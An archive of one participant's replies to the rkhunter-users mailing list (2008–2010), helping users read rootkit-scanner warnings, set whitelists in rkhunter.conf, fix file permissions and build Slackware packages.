> [15:02:38] Info: Starting test name 'possible_rkt_strings'
> [15:02:38] Info: Using system startup paths: /etc/rc.d /etc/rc.local
> /usr/local/etc/rc.d /usr/local/etc/rc.local /etc/conf.d/local.start
> /etc/init.d /etc/inittab
> [15:02:38] Warning: Checking for possible rootkit strings [ Warning ]
> [15:02:39]  No system startup files found.

Maybe these warnings shine up because "rkhunter" doesn't know that it  
runs on a Mac.

> [14:49:56] /bin/bash   [ Warning ]
>
> [14:49:56] Warning: No hash value found for file '/bin/bash' in the
> rkhunter.dat file.

Hmmm - what about "missing hashes" ...?

> I also googled the Dica-Kit rootkit, the Sophos website
> http://www.sophos.com/security/analyses/viruses-and-spyware/trojdicak
> it.html contains the following information:

> "Troj/Dica-Kit is a rootkit for the Linux operating sytem. ... The
> rootkit replaces several system binaries such as netstat, tcpd, ls,
> ps, pstree, top, read, write and ifconfig with its own versions that
> hide the files, processes and network connections of the Trojan. ...

Maybe it's a warning only because you haven't told rkhunter that it runs  
on a Mac.

But it's (as far as I can guess) not impossible that your system is  
corrupted by a virus; "--propupd" doesn't remove virusses etc, it makes  
hashes of some existing files and believes they are clean (only if the  
hash value changes some time later rkhunter warns you).

Viele Gruesse!
Helmut

--

___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] rcs files

[Helmut Hullen]

Hallo,

"rkhunter" seems to have a problem with "*,v" files (which are typical  
for rcs files):

"rkhunter.conf":

RTKT_FILE_WHITELIST=/etc/init.d/RCS/boot.local.neu,v
# wegen Xzibit


"rkhunter.log":

Whitelisted rootkit file does not exist: /etc/init.d/RCS/boot.local.neu
Whitelisted rootkit file does not exist: v



How can I declare whitelisted files with the extension ",v"?

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Possible Root Kit?

[Helmut Hullen]

Hallo, Sportsman,

Du meintest am 02.05.10 zum Thema RE: [Rkhunter-users] Possible Root Kit?:

>>> Warning: Network TCP port 47107 is being used by
>>> /usr/local/apache/bin/httpd. Possible rootkit: T0rn

>>>  Use the 'lsof -i' or 'netstat -an' command to check this.

>> Have you tried these commands?

> Yeah I tried both of the commands but I have no idea what I'm looking
> at or what it means.

What is the output of these commands?

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Possible Root Kit?

[Helmut Hullen]

Hallo, Sportsman,

Du meintest am 01.05.10:

> Warning: Network TCP port 47107 is being used by
> /usr/local/apache/bin/httpd. Possible rootkit: T0rn

>  Use the 'lsof -i' or 'netstat -an' command to check this.

Have you tried these commands?

It's a good idea to look for the last clean backup ...

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Re RKH permissions

[Helmut Hullen]

Hallo, gordy,

Du meintest am 29.04.10:

> I am not a part of the RKH team but they let me maintain the wiki.

> I have taken a hint and improved the wiki slightly by adding the root
> permission bit to the intro of the wiki.

> https://sourceforge.net/apps/trac/rkhunter/wiki/MPRKH

> I suggest you read the wiki and feel free to private email me or post
> thru the mailing list.

It's a fine Wiki - thank you!

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Newer User

[Helmut Hullen]

Hallo, john,

Du meintest am 28.04.10:

> I am new to using RKhunter.  I am getting some warnings.  I am pretty
> sure they are caused by updates I have taken.

> Could someone take a look for me and confirm what I am thinking?  If
> someone would like to help I will post my log file as a reply. If
> there is another log that will help confirm what I am thinking I will
> try to post that as well.

http://sourceforge.net/apps/trac/rkhunter/wiki/MPRKH#Contents

(I've just seen it - it's fine!)

Perhaps you need the paragraphs

Commands --propupd and --update

First Scan

Check Log and modify CONF

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Re RKH permissions

[Helmut Hullen]

Hallo, Call,

Du meintest am 29.04.10:

> Re RKHunter.

> Did the scanning. Great. Interesting results worthy of further
> investigation. Instruction - see log file. Go to open log file using
> occassionally stupid Gedit, permission denied, must be root to view.
> Tried with several better text editors; Kate, Leaf? etc.

What do you want to edit in the log file?
A simple text viewer can do the job (ok - I prefer "mc").

And because running "rkhunter" is a root job it's a good choice to allow  
only root viewing the results.

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Many Warnings after RHEL4 system update.

[Helmut Hullen]

Hallo, White,,

Du meintest am 22.02.10:

> After a big update on RHEL4 I now get all these warnings, before I
> only had a couple,  how can I clear that up?


> Performing file properties checks
> Checking for prerequisites[ OK ]
> /bin/awk  [ OK ]
> /bin/basename [ Warning ]
> /bin/bash [ Warning ]

(etc.)

Have you run

rkhunter --propupd

after installing new binaries?

Viele Gruesse!
Helmut

--
Download Intel® Parallel Studio Eval
Try the new software tools for yourself. Speed compiling, find bugs
proactively, and fine-tune applications for parallel performance.
See why Intel Parallel Studio got high marks during beta.
http://p.sf.net/sfu/intel-sw-dev
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] whitelisting "/dev/ida"

[Helmut Hullen]

Hallo, John,

Du meintest am 07.02.10 zum Thema Re: [Rkhunter-users] whitelisting "/dev/ida":

>> I can put a line
>>
>>   RTKIT_DIR_WHITELIST=/dev/ida

> That should be 'RTKT_DIR_WHITELIST'.

Was a typo in my mail, not in "rkhunter.conf" - sorry.

>> into "/etc/rkhunter.conf", but then I see two problems:
>>
>> 1) "rkhunter" finds no entries like "/dev/ida/.inet/logclear"
>>

> Seems to work fine for me. From my log file:

> [20:58:11]   Checking for directory '/dev/ida/.inet'[ Found ]
> [20:58:11] Warning: Xzibit Rootkit  [ Warning
> ] [20:58:11]  File '/dev/ida/.inet/logclear' found
> [20:58:11]  Directory '/dev/ida/.inet' found

You're right - I hadn't tested this behaviour (with a handmade "/dev/ 
ida/.inet/logclear") but only assumed.

The main problem (in my installations, with hard coded "/dev/ida",  
without "udev") therefore doesn't exist - ok.

>> 2) a comment in "rkhunter.conf" says the directory must exist - if
>> "udev" is running and no "ida" device exists then "udev" doesn't
>> produce a "/dev/ida" directory.
>>
>> Any solution?

> I'm currently thinking, but have not discussed this with the
> developers yet, that maybe we can relax RKH from being so strict, but
> provide a 'consistency' option by which RKH will check that all
> configured/whitelisted files/dirs/pathnames do exist.

[...]

Sounds good - thank you!

Viele Gruesse!
Helmut

--
The Planet: dedicated and managed hosting, cloud storage, colocation
Stay online with enterprise data centers and the best network in the business
Choose flexible plans and management services without long-term contracts
Personal 24x7 support from experience hosting pros just a phone call away.
http://p.sf.net/sfu/theplanet-com
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] whitelisting "/dev/ida"

[Helmut Hullen]

Hallo, rkhunter-users,

I run a distribution which uses no "/udev" (it doesn't need hot plugging  
detection etc.). It needs (for running on old machines) "/dev/ida".

"rkhunter" detects this directory as "possible rootkit" - ok.

I can put a line

  RTKIT_DIR_WHITELIST=/dev/ida

into "/etc/rkhunter.conf", but then I see two problems:

1) "rkhunter" finds no entries like "/dev/ida/.inet/logclear"
2) a comment in "rkhunter.conf" says the directory must exist - if  
"udev" is running and no "ida" device exists then "udev" doesn't produce  
a "/dev/ida" directory.

Any solution?

Viele Gruesse!
Helmut

--
The Planet: dedicated and managed hosting, cloud storage, colocation
Stay online with enterprise data centers and the best network in the business
Choose flexible plans and management services without long-term contracts
Personal 24x7 support from experience hosting pros just a phone call away.
http://p.sf.net/sfu/theplanet-com
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Apache2 installed but application httpd not found

[Helmut Hullen]

Hallo, Christian,

Du meintest am 31.01.10:

>> Unfortunatelly, Apache2 process name is apache2 and not httpd, so
>> this check will not succeed.
>> I have the same problem on same OS.

> Hm ok.
> I tried to add the check for apache2. But didn't succeed.

> So I created a symlink /usr/sbin/httpd which points to
> /usr/sbin/apache2.
->> ln -s /usr/sbin/apache2 /usr/sbin/httpd

> Now rkhunter finds httpd which is apache2.

That's an ugly debianism (and Ubuntu makes the same crap).

Maybe "readlink -f apache2" is more reliable.

Viele Gruesse!
Helmut

--
The Planet: dedicated and managed hosting, cloud storage, colocation
Stay online with enterprise data centers and the best network in the business
Choose flexible plans and management services without long-term contracts
Personal 24x7 support from experience hosting pros just a phone call away.
http://p.sf.net/sfu/theplanet-com
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Rkhunter tells me that /usr/bin/rkhunter file properties has changed

[Helmut Hullen]

Hallo, Chris,

Du meintest am 27.01.10:

>>> or
>>> chmod 744 /usr/bin/rkhunter

>> and that may not work - "755" is a better proposal.

> Would 744 not be the same thing as o+x (in this case)?

No. 744 is rwxr--r--

"chmod o+x" changes this pattern to

   rwxr--r-x

I prefer running rkhunter not only from root, but from everybody, and  
then 755 ist the best pattern.

745 is not impossible, but looks strange.

Viele Gruesse!
Helmut

--
The Planet: dedicated and managed hosting, cloud storage, colocation
Stay online with enterprise data centers and the best network in the business
Choose flexible plans and management services without long-term contracts
Personal 24x7 support from experience hosting pros just a phone call away.
http://p.sf.net/sfu/theplanet-com
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Rkhunter tells me that /usr/bin/rkhunter file properties has changed

[Helmut Hullen]

Hallo, gumper,

Du meintest am 26.01.10:

> [r...@archlinux gumper]# rkhunter -c
> bash: /usr/bin/rkhunter: Permission denied

> The file seems to have the right permissions.

> [r...@archlinux gumper]# ls -l /usr/bin/rkhunter
> -rw-r--r-- 1 root root 425660 Jan 26 19:46 /usr/bin/rkhunter

Does "archlinux" really distribute "rkhunter" with these permissions?  
Strange.

Viele Gruesse!
Helmut

--
The Planet: dedicated and managed hosting, cloud storage, colocation
Stay online with enterprise data centers and the best network in the business
Choose flexible plans and management services without long-term contracts
Personal 24x7 support from experience hosting pros just a phone call away.
http://p.sf.net/sfu/theplanet-com
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Rkhunter tells me that /usr/bin/rkhunter file properties has changed

[Helmut Hullen]

Hallo, Chris,

Du meintest am 26.01.10:

>> The file seems to have the right permissions.
>>
>> [r...@archlinux gumper]# ls -l /usr/bin/rkhunter
>> -rw-r--r-- 1 root root 425660 Jan 26 19:46 /usr/bin/rkhunter

> Try setting the executable bit :)
> chmod o+x /usr/bin/rkhunter

That should work

> or
> chmod 744 /usr/bin/rkhunter

and that may not work - "755" is a better proposal.

Viele Gruesse!
Helmut

--
The Planet: dedicated and managed hosting, cloud storage, colocation
Stay online with enterprise data centers and the best network in the business
Choose flexible plans and management services without long-term contracts
Personal 24x7 support from experience hosting pros just a phone call away.
http://p.sf.net/sfu/theplanet-com
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] español spanish

[Helmut Hullen]

Hallo, david,

Du meintest am 07.11.09:

> hello i think that my computer is intected, Im use linux mint


> Checking /dev for suspicious file types  [ Warning ]

No problem.

> rkhunter -c -sk


> Checking /dev for suspicious file types  [Warning ]

No problem.

Viele Gruesse!
Helmut

--
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day 
trial. Simplify your report design, integration and deployment - and focus on 
what you do best, core application coding. Discover what's new with
Crystal Reports now.  http://p.sf.net/sfu/bobj-july
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Inetd services whitelisting?

[Helmut Hullen]

Hallo, John,

Du meintest am 08.10.09:

> Does anyone use inetd (not Xinetd) whitelisting? If so, could you
> please report if it works with Rootkit Hunter version 1.3.4?

> Solaris users will generally need to use the inetd whitelisting
> (unless they have no inetd services running). RKH wouldn't have got
> past testing if it didn't work :-)

> Whitelisting depends partially on whether Solaris 9 or 10 is being
> used. Inetd was changed a fair bit at Solaris 10.

I'm running Linux on my machine - if I remember correct I had to  
uncomment the mentioned lines in "rkhunter.conf".

Viele Gruesse!
Helmut

--
Come build with us! The BlackBerry(R) Developer Conference in SF, CA
is the only developer event you need to attend this year. Jumpstart your
developing skills, take BlackBerry mobile applications to market and stay 
ahead of the curve. Join us from November 9 - 12, 2009. Register now!
http://p.sf.net/sfu/devconference
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Inetd services whitelisting?

[Helmut Hullen]

Hallo, unspawn,

Du meintest am 07.10.09:

>>> Does anyone use inetd (not Xinetd) whitelisting? If so, could you
>>> please report if it works with Rootkit Hunter version 1.3.4?

>> Works. Since many versions, up to 1.3.4

[imported from e-mail]

> I'm
> trying to troubleshoot an issue with a user using inetd
> whitelisting. Unfortunately I do not posess a machine with inetd
> running. Could you please assist us and supply me with one line
> from your inetd conf with a /path/tobinary name and the
> corresponding rkhunter.conf whitelisting line?

#  rkhunter.conf 
# --- partial ---

INETD_CONF_PATH=/etc/inetd.conf

#
# Allow the following enabled xinetd services.
# Only one service per line (use multiple INETD_ALLOWED_SVC lines).
#
# Below are some Solaris 9 and 10 services that may want to be whitelisted.
#
#INETD_ALLOWED_SVC=echo
#INETD_ALLOWED_SVC=/network/rpc-100235_1/rpc_ticotsord
#INETD_ALLOWED_SVC=/network/rpc-100083_1/rpc_tcp
#INETD_ALLOWED_SVC=/network/rpc-100068_2-5/rpc_udp

INETD_ALLOWED_SVC=time
INETD_ALLOWED_SVC=ftp
INETD_ALLOWED_SVC=tftp
INETD_ALLOWED_SVC=telnet
INETD_ALLOWED_SVC=auth
INETD_ALLOWED_SVC=finger
INETD_ALLOWED_SVC=pop3
INETD_ALLOWED_SVC=imap2

# INETD_ALLOWED_SVC=rembo
# INETD_ALLOWED_SVC=swat
# INETD_ALLOWED_SVC=cvs



# --- inetd.conf ---
# --- partial --
timestream  tcp nowait  rootinternal
timedgram   udp waitrootinternal

ftp stream  tcp nowait  root/usr/sbin/tcpd  /usr/sbin/proftpd
telnet  stream  tcp nowait  root/usr/sbin/tcpd  /usr/sbin/in.telnetd

finger  stream  tcp nowait  daemon  /usr/sbin/tcpd  /usr/sbin/in.fingerd -s 
-l
authstream  tcp nowait.200  nobody  /usr/sbin/in.identd 
in.identd -N
pop3stream  tcp nowait  root/usr/sbin/tcpd  /usr/sbin/popa3d
imap2   stream  tcp nowait  root/usr/sbin/tcpd  /usr/sbin/imapd

# --

Viele Gruesse!
Helmut

--
Come build with us! The BlackBerry(R) Developer Conference in SF, CA
is the only developer event you need to attend this year. Jumpstart your
developing skills, take BlackBerry mobile applications to market and stay 
ahead of the curve. Join us from November 9 - 12, 2009. Register now!
http://p.sf.net/sfu/devconference
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Inetd services whitelisting?

[Helmut Hullen]

Hallo, unspawn,

Du meintest am 07.10.09:

> Does anyone use inetd (not Xinetd) whitelisting? If so, could you
> please report if it works with Rootkit Hunter version 1.3.4?

Works. Since many versions, up to 1.3.4

Viele Gruesse!
Helmut

--
Come build with us! The BlackBerry(R) Developer Conference in SF, CA
is the only developer event you need to attend this year. Jumpstart your
developing skills, take BlackBerry mobile applications to market and stay 
ahead of the curve. Join us from November 9 - 12, 2009. Register now!
http://p.sf.net/sfu/devconference
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

[Rkhunter-users] wget and netrc

[Helmut Hullen]

Hallo,

may you please change the order of download programs in WEBCMDLIST or  
the options of these programs?

The first program in the list is wget, and wget uses .netrc. And  
therefore it reports (without other options for wget) the passwords in  
.netrc on and on.

I've put wget behind lynx - works (now the first program is curl, and  
curl doesn't show the sensible contents of .netrc).

Viele Gruesse!
Helmut

--
Register Now & Save for Velocity, the Web Performance & Operations 
Conference from O'Reilly Media. Velocity features a full day of 
expert-led, hands-on workshops and two days of sessions from industry 
leaders in dedicated Performance & Operations tracks. Use code vel09scf 
and Save an extra 15% before 5/3. http://p.sf.net/sfu/velocityconf
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] How do rootkits get installed on a machine?

[Helmut Hullen]

Hallo, Nigel,

Du meintest am 09.02.09:

> How do rootkits get installed on your machine?

> For example. Would you have to have an Internet accessable webserver,
> or ssh server available?

One simple way:
SSH accessable server, with a simple "root" password.

You have to wait 1 day (max.), and then your systems belongs to another  
guy.

Viele Gruesse!
Helmut

--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] The Rootkit Hunter project team announces release 1.3.4

[Helmut Hullen]

Hallo,

I wrote am 13.01.09:

>>> thank you, but where is the download?

>> You mean it isn't at
>> http://sourceforge.net/project/platformdownload.php?group_id=155034

> [...]

> There seems something wrong.

[...]


> When I change "--install" to "--show", the script tells

> PREFIX: /tmp/rkhunter
> Application:/tmp/rkhunter/bin
> Configuration file: /tmp/rkhunter/etc
> Documents:  /tmp/rkhunter/share/doc/rkhunter-1.3.4
> Man page:   /tmp/rkhunter/share/man/man8
> Scripts:/tmp/rkhunter/lib/rkhunter/scripts
> Databases:  /tmp/rkhunter/var/lib/rkhunter/db
> Temporary files:/tmp/rkhunter/var/lib/rkhunter/tmp

> Got STRIPROOT="/tmp/rkhunter"

> 

> That's not good - the documents have to go to "/usr/share", not to
> "share". Same with "scripts".

I tried the patch "rkhunter-tgz.diff from



(thanks to UnSpawn); works well.

cd /path/to/rkhunter-1.3.4
TGZ_BUILD_ROOT=/tmp/rkhunter
mkdir -p $TGZ_BUILD_ROOT
export TGZ_BUILD_ROOT
./installer.sh --layout TGZ --install

produces the files for a tarball in "/tmp/rkhunter", (nearly) ready for  
a slackware packet.

  http://arktur.shuttle.de/CD/Testpakete/rkhunter-1.3.4-noarch-3hln.tgz

is a packet which is completely ready (it doesn't destroy "/etc/ 
rkhunter.conf" if it exists).

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by:
SourcForge Community
SourceForge wants to tell your story.
http://p.sf.net/sfu/sf-spreadtheword
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] The Rootkit Hunter project team announces release 1.3.4

[Helmut Hullen]

Hallo, unspawn,

Du meintest am 31.12.08 zum Thema Re: [Rkhunter-users] The Rootkit Hunter 
project team announces release 1.3.4:

>> thank you, but where is the download?

> You mean it isn't at
> http://sourceforge.net/project/platformdownload.php?group_id=155034

[...]

There seems something wrong.

I have "compiled" it with the script

#! /bin/bash


Ziel=/tmp/rkhunter
rm -rf $Ziel
mkdir -p $Ziel/usr


./installer.sh --layout custom $Ziel \
 --striproot $Ziel --install > install.log 2>installerr.log
#

When I change "--install" to "--show", the script tells

PREFIX: /tmp/rkhunter
Application:/tmp/rkhunter/bin
Configuration file: /tmp/rkhunter/etc
Documents:  /tmp/rkhunter/share/doc/rkhunter-1.3.4
Man page:   /tmp/rkhunter/share/man/man8
Scripts:/tmp/rkhunter/lib/rkhunter/scripts
Databases:  /tmp/rkhunter/var/lib/rkhunter/db
Temporary files:/tmp/rkhunter/var/lib/rkhunter/tmp

Got STRIPROOT="/tmp/rkhunter"



That's not good - the documents have to go to "/usr/share", not to  
"share". Same with "scripts".

I don't want "rkhunter" somewhere under "/usr/local".


I made a slackware packet;

  http://arktur.shuttle.de/CD/Testpakete/rkhunter-1.3.4-noarch-1hln.tgz

When I run this packet (after installation in the slackware way)

/bin/rkhunter --update

I get the log file

[15:49:12] Running Rootkit Hunter version 1.3.4 on Izar
[15:49:12]
[15:49:12] Info: Start date is Di 13. Jan 15:49:12 CET 2009
[15:49:12]
[15:49:12] Checking configuration file and command-line options...
[15:49:12] Info: Detected operating system is 'Linux'
[15:49:12] Info: Uname output is 'Linux Izar.wm8.hullen.de 2.6.25.19-ODS #1 SMP 
PREEMPT Fri Oct 24 14:22:17 CEST 2008 i686 Pentium III (Coppermine) 
GenuineIntel GNU/Linux'
[15:49:13] Info: Command line is /usr/bin/rkhunter --update
[15:49:13] Info: Environment shell is /bin/bash; rkhunter is using bash
[15:49:13] Info: Using configuration file '/usr/etc/rkhunter.conf'
[15:49:13] Info: Installation directory is '/usr'
[15:49:13] Info: Using language 'en'
[15:49:13] Info: Using '/usr/var/lib/rkhunter/db' as the database directory
[15:49:13] Info: Using '/usr/lib/rkhunter/scripts' as the support script 
directory
[15:49:13] Info: Using '/sbin /usr/sbin /usr/local/bin /usr/bin /bin /usr/games 
/root/bin /usr/lib/qt/bin /bin /usr/bin /sbin /usr/sbin /usr/local/bin 
/usr/local/sbin /usr/libexec /usr/local/libexec' as the command directories
[15:49:13] Info: Using '/' as the root directory by default
[15:49:13] Info: Using '/usr/var/lib/rkhunter/tmp' as the temporary directory

[...]

There are wrong pathes: I started "/bin/rkhunter", not "/usr/bin/ 
rkhunter". Wrong configuration path, wrong scripts path, wrong temp  
path.

Where is the mistake?

Viele Gruesse!
Helmut

--
This SF.net email is sponsored by:
SourcForge Community
SourceForge wants to tell your story.
http://p.sf.net/sfu/sf-spreadtheword
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Lots of warnings

[Helmut Hullen]

Hallo, Mark,

Du (munguanaweza) meintest am 04.12.08:

> quotes didn't come out as being very distinctive.  To fix this I set
> up a gmail account that allows me to send mail without regard to my
> location around the world.

Thank you!

> This is presented in the second attachment rkhunter warnings.

Please don't put pure text files into word processor documents. Please  
don't use attachments etc.
Thank you!

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] I Need Some Help Please

[Helmut Hullen]

Hallo, Al,

Du (gy.al51) meintest am 01.12.08:

> I have Ubuntu Hardy Heron OS, and I think that I have accidentally
> had a keylogger and some other root kits installed on it.

Then delete the installation and make a new one.

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] I Need Some Help Please

[Helmut Hullen]

Hallo, Mark,

Du (munguanaweza) meintest am 02.12.08:

> Hi,

-- quoting ---

> Actually, the system looks pretty clean to me. The four files
> /usr/bin/groups, /usr/bin/ldd, /sbin/chkconfig, and /sbin/ifup
> are very slightly concerning. As I mentioned, they may simply
> be scripts on your system, and informing rkhunter about your
> package manager may make those go away.

---


- your own text --

> The /dev file readout
>   /dev/shm/sysconfig/config-lo: ASCII text
> [23:28:37]  /dev/shm/sysconfig/config-eth1: ASCII text
> [23:28:37]  /dev/shm/sysconfig/config-eth0: ASCII text
> [23:28:37]  /dev/shm/sysconfig/new-stamp-3: ASCII text
> [23:28:37]  /dev/shm/sysconfig/new-stamp-2: ASCII text

> I don't know what these particular readouts mean.

Please use a better reader for your mail, which can work with quoting  
etc, which has the option "reply" etc.

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] (no subject)

[Helmut Hullen]

Hallo, Sportsman,

Du (info) meintest am 08.10.08:

> First let me start off by saying I'm a complete newbie to the
> dedicated server field, ssh and security.  I have paid configserver
> to install a security package and root kit hunter was part of it.

Ok - your provider can read the configuration file. Mybe he doesn't  
allow you to read it too.
But that's a problem between your provider and you.

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Can't update rkhunter

[Helmut Hullen]

Hallo, Kenton,

Du (kbrede) meintest am 04.09.08:

>>> Yesterday I installed rkhunter 1.3.2.  When I run a "rkhunter
>>> --update" it just hangs.

I've just tried it (again): no problems. Same rkhunter version.

"/var/lib/rkhunter/db/mirrors.dat" has 58 bytes, only "root" can access  
it.

Contents (just updated, with the "update" command): only the mirror  
"rkhunter.sorceforge.net" (full http URL, just as you have shown) and  
the version.

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] is this a intrusion?

[Helmut Hullen]

Hallo, Mix,

Du (michitux) meintest am 28.07.08:

> (intelcore2 2,3g and 2gb ram with ubuntu 8.04)


> [23:08:20] /bin/kill [
> Warning ] [23:08:20] Warning: The file properties have changed:
> [23:08:20]  File: /bin/kill
> [23:08:20]  Current hash: 5f85ce91eafbd85f79441f71ecad0f0db72
> 2c1bf [23:08:20]  Stored hash :
> 18e7cde8dfbeac32608ae47f857d2b168cfc72cb [23:08:20]  Current
> inode: 4915243Stored inode: 5242882 [23:08:20]  Current
> file modification time: 1215682114 [23:08:20]  Stored file
> modification time : 1205447087

Has Ubuntu updates some files?

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] infected and trojans

[Helmut Hullen]

Hallo, Martin,

Du (martin) meintest am 15.07.08:

> This doesnt look good? Any ideas?



> Checking `bindshell'... INFECTED (PORTS:  465)

> Checking `lkm'... Enye LKM found

> chkproc: Warning: Possible LKM Trojan installed


http://lists.debian.org/debian-user-german/2004/05/msg02024.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=160539
http://www.mail-archive.com/[EMAIL PROTECTED]/msg341361.html
http://guru.multimedia.cx/a-few-days-ago-chkrootkit-told-me-enye-lkm-found/

Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] Scanning for hidden files

[Helmut Hullen]

Hallo, Martin,

Du (martin) meintest am 15.07.08:

> I get this mail everyday. I dont understand what it means. What do i
> have to do?


> Scanning for hidden files...  [ Warning! ]

> -
> Found warnings:

> [06:25:46] WARNING, found:  /dev/.static (directory)  /dev/.udev
> (directory)  /dev/.initramfs (directory)
> -

Look in "/etc/rkhunter.conf" for "ALLOWHIDDENDIR".


Viele Gruesse!
Helmut

-
This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
Build the coolest Linux based applications with Moblin SDK & win great prizes
Grand prize is a trip for two to an Open Source event anywhere in the world
http://moblin-contest.org/redirect.php?banner_id=100&url=/
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Re: [Rkhunter-users] warnings

[Helmut Hullen]

Hallo, Terry,

Du (fastsnip-family1) meintest am 06.07.08:

> I receive daily the following warnings from rkhunter, version 1.3.0
> ===
> Date: Sun, 06 Jul 2008 14:05:10 -0400

> Warning: Hidden directory found: /dev/.static
> Warning: Hidden directory found: /dev/.udev
